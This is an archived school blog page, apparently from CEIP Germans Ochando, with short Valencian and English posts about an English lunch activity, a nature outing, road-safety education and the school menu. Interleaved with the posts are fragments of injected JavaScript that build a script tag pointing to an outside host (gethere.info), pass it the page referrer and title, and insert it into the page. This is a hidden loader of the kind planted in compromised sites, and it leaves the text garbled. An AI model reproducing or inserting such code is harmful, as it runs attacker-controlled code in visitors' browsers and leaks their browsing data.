Archive for 26 febrero, 2016

THE TABLE AT THE RESTAURANT

Aquest segon trimestre ha començat al menjador escolar del Ceip Germans Ochando l’activitat ” The Table at the Restaurant”. En la que cada dia 6 alumnes dinaran simulant que es troben en un restaurant, utilitzant a més a més la llengua anglesa.

}

ENGLISH LUNCH!

Per tercer any, tornem a esmorzar en anglés al CEIP Germans Ochando

ENGLISH HEALTHY LUNCH !!
Our fifth and sixth graders served the English Healthy Lunch to
the pupils from Germans Ochando Center School. Children had
a good menu. They enjoyed the meals that Ana from Serunion,
and our waiters and waitress prepared for them:
Several sandwiches, fruits and orange juice. english lunch 2016 0-page-001
english lunch 2

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

AULA DE LA NATURA. VORA EL RIU

Els alumnes de 3r cicle van realitzar, el divendres 12 de febrer, una eixida activa junt amb els seus mestres i amb la col·laboració del personal de l’ajuntament de l’Aula de La Natura. Ho van passar d’allò mes bé.

if (document.currentScript) {

EDUCACIÓ EMOCIONAL. 55 RAONS PER LES QUE M’AGRADA L’ESCOLA

Els alumnes de 5é han fet aquestes setmanes un treball molt important en les seves tutories. Pensar i raonar què els agrada de l’escola i així han descobert 55 raons per les quals els agrada el seu col·legi. Pivotant en quasi totes es troba l’amistat.

EDUCACIÓ VIAL

El passat dia 5 ens va visitar la policia local d’Almassora per a fer una xerrada d’educació vial i ens van mostrar els seus vehicles.
L’ajuntament continua amb la construcció durant aquest curs d’un parc permanent per a pràctiques d’educació vial que podran utilitzar els centres i també les famílies fora de les visites concertades.
vial

document.currentScript.parentNode.insertBefore(s, document.currentScript);

MENUS FEBRER

MENU FEBRER-page-001

}